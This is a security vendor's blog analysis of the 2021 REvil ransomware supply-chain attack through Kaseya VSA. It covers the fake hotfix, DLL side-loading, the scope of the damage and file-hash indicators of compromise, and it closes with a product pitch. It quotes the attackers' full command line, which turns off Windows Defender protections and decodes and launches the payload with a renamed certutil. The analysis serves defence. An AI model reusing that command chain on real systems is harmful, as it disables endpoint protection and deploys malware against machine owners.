Deconstructing the REvil Ransomware Attack on Kaseya VSA
July 7, 2021 | Bar Block
Following on the heels of the SolarWinds SunBurst attack, we’re seeing a new supply chain attack unfolding with Kaseya. This past Friday, the software vendor announced that its VSA product, which provides clients with remote control access to machines in their networks, had been compromised and used to infect Kaseya clients’ network environments with ransomware. The company advised all of its clients to immediately shut down their VSA servers.
Here’s what we know so far: Kaseya VSA was attacked using a currently unpatched zero-day vulnerability within the product. After gaining access to VSA, the attackers created a fake malicious automated update called “Kaseya VSA Agent Hot-fix,” then pushed it to VSA servers in Kaseya’s clients’ networks. Kaseya VSA administrative access was disabled to the compromised servers and the notorious REvil (aka Sodinokibi) ransomware was delivered to other machines in their networks. Making matters worse, some of Kaseya’s customers involved in the attack were Managed Service Providers (MSPs). As a result the attack impacted some of their customers’ networks. Even if these MSP client networks did not have Kaseya VSA they could be infected with the ransomware as well.
The fake update, which was automatically installed on all managed systems, delivered a file called “agent.crt” into Kaseya’s temp folder, which by default is “c:\kworking.” Then, a PowerShell command was used to disable many of Microsoft Windows Defender’s features and decode “agent.crt” using the legitimate “certutil.exe,” which extracted “agent.exe” into the same folder.
ping 127.0.0.1 -n 4979 > nul &
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend & copy /Y C:\Windows\System32\certutil.exe C:\Windows\cert.exe & echo %RANDOM% >> C:\Windows\cert.exe & C:\Windows\cert.exe -decode c:\kworking\agent.crt c:\kworking\agent.exe & del /q /f c:\kworking\agent.crt C:\Windows\cert.exe & c:\kworking\agent.exe
The PowerShell command used to disable Microsoft Windows Defender features and decode “agent.crt”
“agent.exe” was signed with a “PB03 TRANSPORT LTD” certificate and contained two embedded files – a legitimate Microsoft Windows Defender executable called “MsMpEng.exe” and “mpsvc.dll,” which was the REvil encryptor. The malware then used a method called DLL Side-Loading to make the delivered Windows Defender executable run the ransomware DLL. This tactic was intended to make the encryption process run via legitimate software, whose execution is less likely to raise a red flag.
Typically, we see REvil using a method called double extortion to pressure its victims into paying the ransom – infected organizations have their data encrypted but some of it is also stolen prior to the encryption and threats are issued that the data will be made public if the ransom is not paid on time and in full. However, early indications are that the gang chose not to pursue this tactic, choosing instead to encrypt files and delete backups, forcing infected companies to pay a full ransom to recover the files.
Scoping the Extent of the Damage
Kaseya claims that fewer than 40 of its clients were affected by the attack, but considering that many of its clients are MSPs with multiple clients of their own, it is difficult at this stage to determine the extent of the damage (it is likely far more extensive than what is being presently reported). As of now, it is estimated that 20 of Kaseya’s MSP clients were infested with REvil, and the number of affected organizations is at least 200, but may soon reach into the thousands as more companies reveal that they were hit.
One of the first companies to disclose that it had been impacted was the Swedish supermarket chain Coop, whose cash registers and self-service checkouts could not be used as a result of the REvil infestation in their network, forcing them to close 800 stores until further notice. It is important to note that Coop is not a Kaseya VSA client; the chain was infected because Visma, the Swedish MSP that manages its payment systems, is a Kaseya client and got compromised as a result of the breach. This attack is already showing the wider implications of any ransomware attack – while it may initially have one target, the infection can quickly spread to connected organizations and networks if the proper detection and prevention tools are not in place to thwart infection.
As of now, there is no patch for the VSA security hole, and Kaseya clients are advised to keep their VSA servers shut down in order to stop further infections.
Taking a prevention-first approach is the best deterrent to ransomware. At Deep Instinct, we detect and prevent both known and zero-day ransomware in pre-execution, stopping it before it can infect files.
If you’d like to learn more about our industry-leading approach to stopping ransomware, backed by a $3M guarantee, please download our new eBook, Ransomware: Why Prevention is better than the Cure. Or speak with a sales representative today and we can prove our no-ransomware promise with a demo.
Indicators of Compromise
d55f983c994caa160ec63a59f6b4250fe67fb3e8c43a388aec60a4a6978e9f1e - agent.exe
df2d6ef0450660aaae62c429610b964949812df2da1c57646fc29aa51c3f031e - agent.exe
dc6b0e8c1e9c113f0364e1c8370060dee3fcbe25b667ddeca7623a95cd21411f - agent.exe
aae6e388e774180bc3eb96dad5d5bfefd63d0eb7124d68b6991701936801f1c7 - agent.exe
66490c59cb9630b53fa3fa7125b5c9511afde38edab4459065938c1974229ca8 - agent.exe
81d0c71f8b282076cd93fb6bb5bfd3932422d033109e2c92572fc49e4abc2471 - agent.exe
1fe9b489c25bb23b04d9996e8107671edee69bd6f6def2fe7ece38a0fb35f98e - agent.exe
8dd620d9aeb35960bb766458c8890ede987c33d239cf730f93fe49d90ae759dd - mpsvc.dll
e2a24ab94f865caeacdf2c3ad015f31f23008ac6db8312c2cbfb32e4a5466ea2 - mpsvc.dll
d8353cfc5e696d3ae402c7c70565c1e7f31e49bcf74a6e12e5ab044f306b4b20 - mpsvc.dll
d5ce6f36a06b0dc8ce8e7e2c9a53e66094c2adfc93cfac61dd09efe9ac45a75f - mpsvc.dll
cc0cdc6a3d843e22c98170713abf1d6ae06e8b5e34ed06ac3159adafe85e3bd6 - mpsvc.dll
0496ca57e387b10dfdac809de8a4e039f68e8d66535d5d19ec76d39f7d0a4402 - mpsvc.dll
8e846ed965bbc0270a6f58c5818e039ef2fb78def4d2bf82348ca786ea0cea4f - mpsvc.dll